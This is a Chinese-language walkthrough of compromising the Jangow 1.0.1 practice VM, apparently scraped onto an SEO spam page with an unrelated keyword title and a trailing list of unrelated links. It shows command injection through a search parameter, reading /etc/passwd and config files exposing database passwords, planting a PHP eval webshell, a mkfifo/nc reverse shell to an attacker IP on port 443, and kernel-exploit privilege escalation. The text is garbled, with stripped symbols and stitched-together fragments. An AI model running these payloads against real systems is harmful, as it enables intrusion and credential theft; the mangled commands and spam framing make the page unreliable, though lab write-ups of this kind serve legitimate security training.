当前位置: 首页 > news >正文

如何打开国外网站免费收录网提交

如何打开国外网站,免费收录网提交,电脑怎么做网站服务器,深圳网站设计报价文章目录 网卡配置信息收集主机发现端口扫描 漏洞利用反弹Shell提权 靶机文档#xff1a;JANGOW 1.0.1 下载地址#xff1a;Download (Mirror) 难易程度#xff1a;. 网卡配置 水果味儿 信息收集 主机发现 端口扫描 访问80端口 点击site目录 点击页面上方的一个选项… 文章目录 网卡配置信息收集主机发现端口扫描 漏洞利用反弹Shell提权 靶机文档JANGOW 1.0.1 下载地址Download (Mirror) 难易程度. 网卡配置 水果味儿 信息收集 主机发现 端口扫描 访问80端口 点击site目录 点击页面上方的一个选项发现Buscar的页面空白而且地址栏的url看着可以输入一些东西 http://192.168.8.16/site/busque.php?buscar在?buscar后面加上pwd显示了当前路径 /site/busque.php?buscarpwd /site/busque.php?buscarcat%20/etc/passwd /site/busque.php?buscarls%20-a 发现了wordpress 查看wordpress里都有什么文件 ls wordpress 查看cat%20wordpress/config.php页面空白需要查看页面源代码 发现了数据库配置 $database desafio02; $username desafio02; $password abygurl69;漏洞利用 使用命令执行写入一句话木马 echo ?php eval($_POST[6868]); 6868.php使用蚁剑连接一句话拿到webshell 跟site目录同级下有一个隐藏的.backup文件 $database jangow01; $username jangow01; $password abygurl69;拿到webshell权限极低啥也干不了 反弹Shell 查看攻略该网站限制了一些端口只能通过443端口进行访问 /etc/ufw/applications.d/查看apache2-utils.ufw.profile文件 上传木马 ?php system(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 21|nc 192.168.8.8 443 /tmp/f);?kali监听443端口 访问该木马文件 成功反弹到 提权 交换shell python3 -c import pty;pty.spawn(/bin/bash)查看内核版本 搜索相关漏洞 searchsploit ubuntu 4.4.0-31searchsploit -p linux/local/45010.c将45010.c上传的靶机 我先发送到我本机然后本机上传到蚁剑上 赋予可执行权限然后进行编译 上传一个a.out文件执行它 切到/root目录下
http://www.hkea.cn/news/14416326/

相关文章:

  • 网站怎么做背景图片西安网站建设推广
  • 优惠网站代理怎么做如何制作网页教程
  • 上海好的网站制作公司苏州网站建设报价单
  • 外贸网站建设有用吗c 网站开发怎么弹出输入框
  • 如何做淘宝优惠卷网站投资做网站
  • 宽城区网站建设怎样在文章后做网站链接
  • 今科网站建设费用旅游网站建设的目标是什么意思
  • 上海建筑网站郑州最牛的网站开发公司
  • 博宇娱乐网站建设做网站友情链接互换
  • 做更好的自己 网站网站怎么做发送邮件的超链接
  • 企业免费网站制作龙江人社 pp
  • 在哪些网站上做推广好北京海淀建设支行有哪些
  • 网站开发前端和后端工作柯桥做网站哪家好
  • 学习php网站开发微信开发小程序教程
  • 网站空间怎样设置用户名和密码wordpress 主题开发
  • 怎么才能打开一些网站经典设计产品
  • 一级做爰片a视频网站哈尔滨网站专业制作
  • 怎么做钓鱼网站北京装修公司加盟
  • 做网站大概一个月多少工资微信客户端入口
  • 常州企业网站建站模板二维码怎么制作出来的
  • 成品网站源码做网站公司哪个好
  • 万网企业网站建设建筑工程网格化管理
  • 网站关键字怎么分割今天刚刚的最新新闻
  • 网站设计包括哪些内容蛋糕网站内容规划
  • 成都网站设计创新互联网站制作1
  • 网站二次开发费用虚拟空间官网
  • 游戏平台网站开发大学生创新创意产品设计方案
  • 深圳专业建站公司有哪些天门建设局官方网站
  • 网站后台网址忘记了 php龙岗网站制作
  • 网站开发用户需求分析网站主动服务方案